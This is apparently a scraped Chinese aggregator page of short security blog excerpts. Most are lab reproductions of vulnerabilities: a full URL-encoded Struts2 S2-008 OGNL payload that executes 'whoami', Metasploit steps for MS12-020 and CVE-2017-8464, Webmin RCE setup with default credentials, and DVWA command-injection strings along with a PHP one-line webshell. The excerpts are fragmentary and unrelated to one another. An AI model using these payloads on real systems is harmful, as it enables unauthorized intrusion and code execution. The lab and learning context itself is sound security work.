漏洞

Apache Struts2远程代码执行漏洞(S2-008)复现

匿名 (未验证) 提交于 2019-12-02 23:57:01
漏洞原理:主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 寻找poc:debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d

Metasploit工具----漏洞利用模块

匿名 (未验证) 提交于 2019-12-02 23:57:01
漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。 每个操作系统都会存在各种Bug,想Windows这样有版权的操作系统,微软公司会很快的开发针对这些Bug的补丁供用户更新。全世界有大量的漏洞研究人员夜以继日的发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day,0day对网络安全的威胁是巨大的。 metasploit常用漏洞利用命令: search <name> # 用指定关键字搜索可利用模块 use <exploit name> # 使用漏洞 show options # 显示可配置参数 set <OPTION NAME> <option> # 设置选项 show payloads # 显示可利用攻击载荷 下面以MS12-020漏洞来演示漏洞利用模块的使用。 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,MS12-020漏洞利用: 本机:kali 192.168.2.135 靶机:windows 2003 192.168.2.134 首先搜索可利用模块。 search ms12 - 020 这里选择

[Shell]CVE-2017-8464漏洞复现

匿名 (未验证) 提交于 2019-12-02 23:57:01
Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。 于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 .LNK 文件后就会被黑客所控制。 成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。 windows 7 ( 32 / 64 位) windows 8 ( 32 / 64 位) windows 8.1 ( 32 / 64 位) windows 10 ( 32 / 64 λ, RTM / TH2 / RS1 / RS2 ) windows server 2008 ( 32 / 64 λ/ IA64 ) windows server 2008 R2 ( 64 λ/ IA64 ) windows server 2012 windows server 2012 R2 windows server 2016 windows Vista 运用Metasploit对目标主机所存在的漏洞进行利用。选用multi/handler监听模块,利用后可获取shell。 首先我们要准备好CVE-2017-8464的复现环境

Webmin&lt;=1.920 RCE 漏洞复现

匿名 (未验证) 提交于 2019-12-02 23:57:01
0x00 前言 本来前一阵就想复现来着,但是官网的版本已经更新了,直到今天才发现Docker上有环境,才进行了复现 0x01影响版本 Webmin<=1.920 0x02 环境搭建 docker search webmin docker pull piersonjarvis / webmin - samba docker run - d - p 10000 : 80 piersonjarvis / webmin - samba 访问你的ip:10000即可访问1.920版本的webmin 使用账号密码: root/webmin登录到后台 开启密码重置功能: Webmin--Webmin confuration--Authentication 0x03 漏洞利用 经过长时间的寻找,未找到修改密码的接口,所以随便抓个包手动构造了一个,数据包如下: POST / password_change . cgi HTTP / 1.1 Host : 136.244 . xx . xx : 10000 User - Agent : Mozilla / 5.0 ( Windows NT 10.0 ; Win64 ; x64 ; rv : 68.0 ) Gecko / 20100101 Firefox / 68.0Accept : text / html , * 最终执行命令成功 参考文章:

DVWA之命令执行

匿名 (未验证) 提交于 2019-12-02 23:56:01
一、命令执行漏洞 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属与代码执行范围内,好比说一句话木马<?php@eval($_POST['cmd']);?> 二、分类: 1.代买过滤不严或无过滤 2.系统漏洞造成的命令执行, bash破壳漏洞,该漏洞可以构造环境变量的值来执行具有攻击力的脚本代码,会应县到bash交互的多种应用,例如http,ssh,dhcp && & | 三、演示 否则不能继续执行 即使第一个command1没有执行成功,也会执行command2 | 2、medium 设置DWVA Security等级 可选择绕过; 第一种绕过:127.0.0.1 &&& dir 3 、high 存在过滤漏洞 “| ” 来源:博客园 作者: Seizer 链接:https://www.cnblogs.com/bryen/p/11437735.html

扫描器开发框架学习

匿名 (未验证) 提交于 2019-12-02 23:55:01
扫描器开发之前要确定自己的目标,我的目标更偏向于指纹识别、RCE类漏洞扫描。因为渗透测试的过程资产收集得越多,那么渗透成功的可能性也就越高,远程执行类漏洞简单粗暴。 学习过程中总是受到各种不可抗拒外力的中断,无法专注精力长时间学习一样事物,内心过于焦躁,全世界的安全技巧不可能全都学完,基础学科才是值得牢记的知识点。把基础知识与套路联动在一起才能突破瓶颈。为了把学习内容不间断的留存在脑子里,之选择了做笔记的方式记录下来。是因为反正也没有什么人看博客,童鞋们焦虑得很。 【通过展示高收益操作来获取人群的认同,这是无数金融家的梦想。】 硬件&OS: 1、 高等数学 2、 计算机组成原理 - 总线/存储器 - 运算器 - Cpu处理器 - 输入输出外设 离散数学基础 概率论与数理统计 3、 操作系统 - 启动/调用 - 进程/线程 - 内存管理 - 文件系统 计算机网络 线性代数 4、 计算机系统结构 - CPU结构 - 指令集 - 寻址方式 近世代数 网络: TCP/IP详解-卷1 应用: 看视频接受度是最高的。熟悉PHP、Python、Java 数据库: SQL - MySQL - MSSQL - Oracle - PostgreSQL NoSQL - MongoDB 内存 - Redis - Memcache 重新理解安全技术 注入漏洞 - SQL注入 - 命令注入 - 表达式

server2012R2一些漏洞的处理

匿名 (未验证) 提交于 2019-12-02 23:55:01
服务器 server2012R2涉及一些漏洞需处理 漏洞的端口有两个 ftp的21端口,和 5986端口 5986端口以及相关 Windows 远程管理 ( WinRM ) 是 WS - Management 协议的 Microsoft 实现。该协议是基于简单对象访问协议 ( SOAP ) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。 WS - Management 协议由硬件和软件制造商群体开发,作为一种公共标准,可用于与实现该协议的任何计算机设备远程交换管理数据。使用 PowerShell 对服务器远程管理,要在远程服务器上启用 WinRMwinrm2 . 0 服务对应了两个端口默认为 5985 ( HTTP 端口)或 5986 ( HTTPS 端口) 针对5986端口发现一些漏洞 ssl - cve - 2016 - 2183 - sweet32 tlsv1_0 - enabled rc4 - cve - 2013 - 2566 sslv3 - cve - 2014 - 3566 - poodle sslv3 - supported ssl - cve - 2011 - 3389 - beast 居然这么多问题就关闭它吧 Powershell 命令关闭 winrm 5986 port : winrm delete winrm / config /

docker入门以及漏洞环境搭建

五迷三道 提交于 2019-12-02 23:53:05
docker开源的应用程序容器引擎,使用GO。借助于docker打包的应用程序,将这些应用程序包含到容器中,实现虚拟化,容器使用的是沙箱机制,相互独立、占用资源非常少。 docker的三个概念: 镜像:imag,docker镜像是一个只读的模板,比如说我们在镜像中包含完整的操作系统,在该操作系统中安装LAMP环境,镜像可以创建容器。 容器:container,docker利用容器运行程序,容器是镜像中创建运行的一个实例,容器可以运行、关闭、可以删除 仓库:repository,集中放镜像的地方 镜像: docker search mysql 搜索mysql镜像 docker pull 镜像名称 下载 docker images 查看本地已经下载好的镜像 docker rmi 镜像id 删除 容器: docker run -d -p 8080:80 --name 容器名 镜像id -d 后台运行 -p 后跟端口 port1:port2 将容器内部服务器端口port2映射到本地端口port1(如果-p后什么也不写,随机分配端口) --rm 容器停止之后会自动删除 --name 容器运行起来之后赋予的名称 docker ps 查看运行中的docker -a 查看所有容器的状态 docker stop 容器名/id 关闭容器 docker start 容器名/容器id 开启容器

DVWA漏洞靶场-命令执行(Command Injection)

匿名 (未验证) 提交于 2019-12-02 23:52:01
漏洞原理    由于开发人员编写源码,没有针对代码中可执行的 特殊函数 入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务器端执行。命令注入攻击中 WEB服务器 没有过滤类似 system (),eval(),exec()等函数是该漏洞攻击成功的最主要原因。   命令执行分隔符:   windows:&&  ||  &     linux:  &&  ||  &  ;   |  可作为管道符pipe用于命令执行,其实根本是pipe的作用   &&:从前往后按顺序执行,遇到出错的命令,后面的不执行   ||:  从前往后按顺序执行,遇到成功的命令,后面的不执行   &:  同时执行所有命令   利用:可尝试进行反弹shell,搭建服务执行wget下载webshell 1.low 级别 127.0.0.1 & ipconfig 执行成功 2.medium 级别 查看源码view-source 3. high 级别 view-source: 进行了更加严格的过滤,注意,这里是对黑名单中所有字符进行替换,&& 也会被替换两次 总结 根据impossible,防御措施,根据输入需要进行严格过滤,类型白名单特征,而不是单单设置blacklist

漏洞银行工控安全直播笔记整理

匿名 (未验证) 提交于 2019-12-02 23:49:02
工业控制系统结构和场景 工业控制系统厂商和产品介绍 工业控制系统脆弱性分析 工业控制系统渗透工具的利用 工业控制系统安全防御 过程自动化 :应用于流程行业,代表行业钢铁、化工、汽车制造等有一套流程的工业系统。较多的应用了DCS系统和大型PLC,PLC的单点IO多为2000+,采用全冗余架构 工厂自动化 :应用于离散行业,代表行业码头自动化集散等离散系统。采用PLC Siemens 西门子 旗下组态软件家族有如下几个:TIA博图/step7,wincc,PLCSIM。西门子通信协议采用私有的S7Comm协议,在102端口通信。 RockWell Automation 罗克韦尔自动化 旗下的组态软件有:studio 5000 RSlogix 5000,FactoryTalk View SF,Emulation。罗克韦尔通信协议采用开源Ethernet/IP协议,通过44818/2222端口通信 工控协议总体缺乏安全意识,在身份认证、授权机制、加密保护上都没有做到很好 工业以太网链路漏洞 主机安全漏洞 一些零碎的东西:ISF利用框架;jiansiting剑总